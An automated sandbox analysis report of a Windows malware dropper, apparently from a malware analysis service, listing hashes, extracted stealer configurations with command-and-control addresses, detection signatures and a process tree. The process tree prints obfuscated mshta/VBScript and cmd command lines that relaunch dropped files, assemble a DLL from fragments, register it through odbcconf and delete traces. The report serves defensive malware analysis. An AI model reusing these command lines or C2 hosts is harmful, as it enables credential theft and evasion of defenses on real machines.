Analysis
max time kernel: 151s
max time network: 137s
platform: windows10_x64
resource: win10-en-20211104
submitted: 29/11/2021, 14:48

Static task: static1
Behavioral task: behavioral1
Sample: 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe
Resource: win10-en-20211104

General
Target: 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe
Size: 335KB
MD5: 48632eaf14caab096c6cc50c0ed237a0
SHA1: 1c8832a5824d71d55f2d39fe5b849fdbd6aba537
SHA256: 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5
SHA512: 06163c6724a1d1e80a58a216fcafbd804f82118eced30ff73e593af874f4a2935af0167c273aefb623f9b31df49989030f0779703379e0da350516b95a5d22eb
Malware Config

Extracted: smokeloader
Version: 2020
Extracted: redline
C2: 185.189.167.130:38637

Extracted: arkei
Botnet: Default
C2: http://file-file-host4.com/tratata.php

Extracted: redline
Botnet: bbtt1
C2: 212.193.30.196:13040

Extracted: vidar
Version: 48.7
Botnet: 706
C2: https://mstdn.social/@anapa
C2: https://mastodon.social/@mniami
profile_id: 706
Signatures

Bazar Loader
Detected loader normally used to deploy BazarBackdoor malware.

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload 4 IoCs
resource | yara_rule
behavioral1/memory/2568-132-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
behavioral1/memory/2568-133-0x0000000000418EEE-mapping.dmp | family_redline
behavioral1/memory/3464-237-0x0000000004F60000-0x0000000004F8E000-memory.dmp | family_redline
behavioral1/memory/3464-242-0x0000000005250000-0x000000000527C000-memory.dmp | family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil

Arkei Stealer Payload 2 IoCs
resource | yara_rule
behavioral1/memory/2400-162-0x00000000036A0000-0x00000000036C1000-memory.dmp | family_arkei
behavioral1/memory/2400-163-0x0000000000400000-0x0000000003232000-memory.dmp | family_arkei

Bazar/Team9 Loader payload 2 IoCs
resource | yara_rule
behavioral1/memory/1700-197-0x00000000006F0000-0x000000000071A000-memory.dmp | BazarLoaderVar6
behavioral1/memory/3972-357-0x0000021285A40000-0x0000021285A6A000-memory.dmp | BazarLoaderVar6

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs

Vidar Stealer 2 IoCs
resource | yara_rule
behavioral1/memory/4000-274-0x00000000036B0000-0x0000000003785000-memory.dmp | family_vidar
behavioral1/memory/4000-284-0x0000000000400000-0x000000000329A000-memory.dmp | family_vidar

Downloads MZ/PE file
Executes dropped EXE 16 IoCs
pid | Process
3540 | 247D.exe
2568 | 247D.exe
904 | 5F93.exe
2400 | 7FCE.exe
2136 | C620.exe
2964 | C99B.exe
2112 | 5b1_g~qYDZdSZ8W.eXe
3464 | D218.exe
2540 | C99B.exe
1296 | E3EC.exe
4000 | F10C.exe
2660 | wbgveig
2076 | ttgveig
1928 | 2C80.exe
1436 | wbgveig
3284 | 55A4.exe

Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | E3EC.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 2C80.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 2C80.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | E3EC.exe

Deletes itself 1 IoCs
pid | Process
3064 | Process not Found

Loads dropped DLL 7 IoCs
pid | Process
1700 | regsvr32.exe
2400 | 7FCE.exe
3616 | odbcconf.exe
3616 | odbcconf.exe
2400 | 7FCE.exe
2400 | 7FCE.exe
3972 | rundll32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Themida packer (yara rule themida) 12 IoCs
resource | yara_rule
behavioral1/files/0x000600000001abb5-191.dat | themida
behavioral1/files/0x000600000001abb5-190.dat | themida
behavioral1/memory/1296-201-0x00000000012B0000-0x00000000019F2000-memory.dmp | themida
behavioral1/memory/1296-204-0x00000000012B0000-0x00000000019F2000-memory.dmp | themida
behavioral1/memory/1296-208-0x00000000012B0000-0x00000000019F2000-memory.dmp | themida
behavioral1/memory/1296-210-0x00000000012B0000-0x00000000019F2000-memory.dmp | themida
behavioral1/files/0x000900000001abb3-299.dat | themida
behavioral1/files/0x000900000001abb3-300.dat | themida
behavioral1/memory/1928-302-0x0000000000250000-0x0000000000932000-memory.dmp | themida
behavioral1/memory/1928-303-0x0000000000250000-0x0000000000932000-memory.dmp | themida
behavioral1/memory/1928-305-0x0000000000250000-0x0000000000932000-memory.dmp | themida
behavioral1/memory/1928-306-0x0000000000250000-0x0000000000932000-memory.dmp | themida
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe
Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe
Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Checks whether UAC is enabled 2 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | E3EC.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 2C80.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid | Process
1296 | E3EC.exe
1928 | 2C80.exe

Suspicious use of SetThreadContext 4 IoCs
description | pid | Process | procid_target
PID 3708 set thread context of 3288 | 3708 | 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe | 68
PID 3540 set thread context of 2568 | 3540 | 247D.exe | 72
PID 2964 set thread context of 2540 | 2964 | C99B.exe | 90
PID 2660 set thread context of 1436 | 2660 | wbgveig | 112

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Checks SCSI registry key(s) 3 TTPs 15 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 5F93.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 5F93.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ttgveig
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ttgveig
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | wbgveig
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | wbgveig
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 5F93.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C99B.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C99B.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C99B.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ttgveig
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | wbgveig

Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | 7FCE.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 7FCE.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | E3EC.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | E3EC.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | F10C.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | F10C.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | 2C80.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 2C80.exe

Delays execution with timeout.exe 4 IoCs
pid | Process
1988 | timeout.exe
4004 | timeout.exe
1512 | timeout.exe
1752 | timeout.exe

Kills process with taskkill 2 IoCs
pid | Process
3376 | taskkill.exe
2416 | taskkill.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs (distinct entries listed)
pid | Process
3288 | 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe
3064 | Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid | Process
3064 | Process not Found

Suspicious behavior: MapViewOfSection 9 IoCs
pid | Process
3288 | 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe
904 | 5F93.exe
3064 | Process not Found
3064 | Process not Found
2540 | C99B.exe
3064 | Process not Found
3064 | Process not Found
2076 | ttgveig
1436 | wbgveig

Suspicious use of AdjustPrivilegeToken 64 IoCs (distinct entries listed)
description | pid | Process
Token: SeShutdownPrivilege | 3064 | Process not Found
Token: SeCreatePagefilePrivilege | 3064 | Process not Found
Token: SeDebugPrivilege | 2568 | 247D.exe
Token: SeDebugPrivilege | 2416 | taskkill.exe
Token: SeDebugPrivilege | 3464 | D218.exe

Suspicious use of WriteProcessMemory 64 IoCs (distinct entries listed)
description | pid | Process | procid_target
PID 3708 wrote to memory of 3288 | 3708 | 190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe | 68
PID 3064 wrote to memory of 3540 | 3064 | Process not Found | 70
PID 3540 wrote to memory of 2568 | 3540 | 247D.exe | 72
PID 3064 wrote to memory of 904 | 3064 | Process not Found | 74
PID 3064 wrote to memory of 2400 | 3064 | Process not Found | 75
PID 3064 wrote to memory of 1700 | 3064 | Process not Found | 76
PID 3064 wrote to memory of 2136 | 3064 | Process not Found | 77
PID 2136 wrote to memory of 3684 | 2136 | C620.exe | 78
PID 3064 wrote to memory of 2964 | 3064 | Process not Found | 79
PID 3684 wrote to memory of 1384 | 3684 | mshta.exe | 80
PID 1384 wrote to memory of 2112 | 1384 | cmd.exe | 82
PID 1384 wrote to memory of 2416 | 1384 | cmd.exe | 83
PID 2112 wrote to memory of 2340 | 2112 | 5b1_g~qYDZdSZ8W.eXe | 84
PID 3064 wrote to memory of 3464 | 3064 | Process not Found | 85
PID 2340 wrote to memory of 3608 | 2340 | mshta.exe | 87
PID 2964 wrote to memory of 2540 | 2964 | C99B.exe | 90
PID 3064 wrote to memory of 1296 | 3064 | Process not Found | 91
PID 2112 wrote to memory of 1204 | 2112 | 5b1_g~qYDZdSZ8W.eXe | 92

outlook_office_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe

outlook_win_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe
Processes
Process tree. The bracketed number is the nesting depth; each entry gives the image path, the command line, the signatures it triggered and its PID. Child processes are indented under their parent.

[1] C:\Users\Admin\AppData\Local\Temp\190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe"
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID: 3708
    [2] C:\Users\Admin\AppData\Local\Temp\190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\190075a28269cf6f6af8badda9799dbbfaf6c153d61488d4ce82013bb76acfe5.exe"
        - Checks SCSI registry key(s)
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        PID: 3288

[1] C:\Users\Admin\AppData\Local\Temp\247D.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\247D.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID: 3540
    [2] C:\Users\Admin\AppData\Local\Temp\247D.exe
        Command line: C:\Users\Admin\AppData\Local\Temp\247D.exe
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
        PID: 2568

[1] C:\Users\Admin\AppData\Local\Temp\5F93.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\5F93.exe
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID: 904

[1] C:\Users\Admin\AppData\Local\Temp\7FCE.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\7FCE.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    PID: 2400
    [2] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7FCE.exe" & exit
        PID: 3896
        [3] C:\Windows\SysWOW64\timeout.exe
            Command line: timeout /t 5
            - Delays execution with timeout.exe
            PID: 1512

[1] C:\Windows\system32\regsvr32.exe
    Command line: regsvr32 /s C:\Users\Admin\AppData\Local\Temp\A894.dll
    - Loads dropped DLL
    PID: 1700

[1] C:\Users\Admin\AppData\Local\Temp\C620.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\C620.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID: 2136
    [2] C:\Windows\SysWOW64\mshta.exe
        Command line: "C:\Windows\System32\mshta.exe" VBSCrIPT: ClOSE (CREaTEOBjeCt ( "wscRipT.shell" ).RUN ( "C:\Windows\system32\cmd.exe /q /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\C620.exe"" ..\5b1_g~qYDZdSZ8W.eXe&&StaRT ..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq & If """" == """" for %o iN ( ""C:\Users\Admin\AppData\Local\Temp\C620.exe"") do taskkill -F -IM ""%~Nxo"" ", 0 , True ) )
        - Suspicious use of WriteProcessMemory
        PID: 3684
        [3] C:\Windows\SysWOW64\cmd.exe
            Command line: "C:\Windows\system32\cmd.exe" /q /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\C620.exe" ..\5b1_g~qYDZdSZ8W.eXe&&StaRT ..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq & If "" == "" for %o iN ( "C:\Users\Admin\AppData\Local\Temp\C620.exe") do taskkill -F -IM "%~Nxo"
            - Suspicious use of WriteProcessMemory
            PID: 1384
            [4] C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe
                Command line: ..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq
                - Executes dropped EXE
                - Suspicious use of WriteProcessMemory
                PID: 2112
                [5] C:\Windows\SysWOW64\mshta.exe
                    Command line: "C:\Windows\System32\mshta.exe" VBSCrIPT: ClOSE (CREaTEOBjeCt ( "wscRipT.shell" ).RUN ( "C:\Windows\system32\cmd.exe /q /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe"" ..\5b1_g~qYDZdSZ8W.eXe&&StaRT ..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq & If ""-PVQQIyT0eqsTq "" == """" for %o iN ( ""C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe"") do taskkill -F -IM ""%~Nxo"" ", 0 , True ) )
                    - Suspicious use of WriteProcessMemory
                    PID: 2340
                    [6] C:\Windows\SysWOW64\cmd.exe
                        Command line: "C:\Windows\system32\cmd.exe" /q /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe" ..\5b1_g~qYDZdSZ8W.eXe&&StaRT ..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq & If "-PVQQIyT0eqsTq " == "" for %o iN ( "C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe") do taskkill -F -IM "%~Nxo"
                        PID: 3608
                [5] C:\Windows\SysWOW64\mshta.exe
                    Command line: "C:\Windows\System32\mshta.exe" VBscriPT:CLOse(crEatEobJect ( "WSCRIPT.sHEll"). run ( "C:\Windows\system32\cmd.exe /C echO | Set /p = ""MZ"" > Y9P8GeW.SYt& coPy /y /b Y9P8GeW.Syt+ iDTWeX.KR + 6VXIK.D + WNYGk.9UB ..\6KSsiU1.MB & del /Q *& STaRt odbcconf /a { REgsvr ..\6ksSIU1.MB } " ,0 , tRuE) )
                    PID: 1204
                    [6] C:\Windows\SysWOW64\cmd.exe
                        Command line: "C:\Windows\system32\cmd.exe" /C echO | Set /p = "MZ" > Y9P8GeW.SYt& coPy /y /b Y9P8GeW.Syt+ iDTWeX.KR + 6VXIK.D + WNYGk.9UB ..\6KSsiU1.MB & del /Q *& STaRt odbcconf /a { REgsvr ..\6ksSIU1.MB }
                        PID: 2068
                        [7] C:\Windows\SysWOW64\cmd.exe
                            Command line: C:\Windows\system32\cmd.exe /S /D /c" echO "
                            PID: 2148
                        [7] C:\Windows\SysWOW64\cmd.exe
                            Command line: C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>Y9P8GeW.SYt"
                            PID: 1316
                        [7] C:\Windows\SysWOW64\odbcconf.exe
                            Command line: odbcconf /a { REgsvr ..\6ksSIU1.MB }
                            - Loads dropped DLL
                            PID: 3616
            [4] C:\Windows\SysWOW64\taskkill.exe
                Command line: taskkill -F -IM "C620.exe"
                - Kills process with taskkill
                - Suspicious use of AdjustPrivilegeToken
                PID: 2416

[1] C:\Users\Admin\AppData\Local\Temp\C99B.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\C99B.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID: 2964
    [2] C:\Users\Admin\AppData\Local\Temp\C99B.exe
        Command line: C:\Users\Admin\AppData\Local\Temp\C99B.exe
        - Executes dropped EXE
        - Checks SCSI registry key(s)
        - Suspicious behavior: MapViewOfSection
        PID: 2540

[1] C:\Users\Admin\AppData\Local\Temp\D218.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\D218.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID: 3464

[1] C:\Users\Admin\AppData\Local\Temp\E3EC.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\E3EC.exe
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Checks processor information in registry
    PID: 1296
    [2] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\ICYgACgqMyH & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\E3EC.exe"
        PID: 404
        [3] C:\Windows\SysWOW64\timeout.exe
            Command line: timeout 4
            - Delays execution with timeout.exe
            PID: 1752

[1] C:\Users\Admin\AppData\Local\Temp\F10C.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\F10C.exe
    - Executes dropped EXE
    - Checks processor information in registry
    PID: 4000
    [2] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c taskkill /im F10C.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\F10C.exe" & del C:\ProgramData\*.dll & exit
        PID: 2220
        [3] C:\Windows\SysWOW64\taskkill.exe
            Command line: taskkill /im F10C.exe /f
            - Kills process with taskkill
            PID: 3376
        [3] C:\Windows\SysWOW64\timeout.exe
            Command line: timeout /t 6
            - Delays execution with timeout.exe
            PID: 1988

[1] C:\Windows\SysWOW64\explorer.exe
    Command line: C:\Windows\SysWOW64\explorer.exe
    - Accesses Microsoft Outlook profiles
    - outlook_office_path
    - outlook_win_path
    PID: 3896

[1] C:\Users\Admin\AppData\Roaming\wbgveig
    Command line: C:\Users\Admin\AppData\Roaming\wbgveig
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID: 2660
    [2] C:\Users\Admin\AppData\Roaming\wbgveig
        Command line: C:\Users\Admin\AppData\Roaming\wbgveig
        - Executes dropped EXE
        - Checks SCSI registry key(s)
        - Suspicious behavior: MapViewOfSection
        PID: 1436

[1] C:\Users\Admin\AppData\Roaming\ttgveig
    Command line: C:\Users\Admin\AppData\Roaming\ttgveig
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID: 2076

[1] C:\Windows\explorer.exe
    Command line: C:\Windows\explorer.exe
    PID: 3588

[1] C:\Users\Admin\AppData\Local\Temp\2C80.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\2C80.exe
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Checks processor information in registry
    PID: 1928
    [2] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\wkFeMoTvexDJT & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2C80.exe"
        PID: 2188
        [3] C:\Windows\SysWOW64\timeout.exe
            Command line: timeout 4
            - Delays execution with timeout.exe
            PID: 4004

[1] C:\Windows\System32\rundll32.exe
    Command line: C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\A894.dll,DllRegisterServer {41B64016-FF23-41ED-916B-82E18061D7E8}
    - Loads dropped DLL
    PID: 3972

[1] C:\Users\Admin\AppData\Local\Temp\55A4.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\55A4.exe
    - Executes dropped EXE
    PID: 3284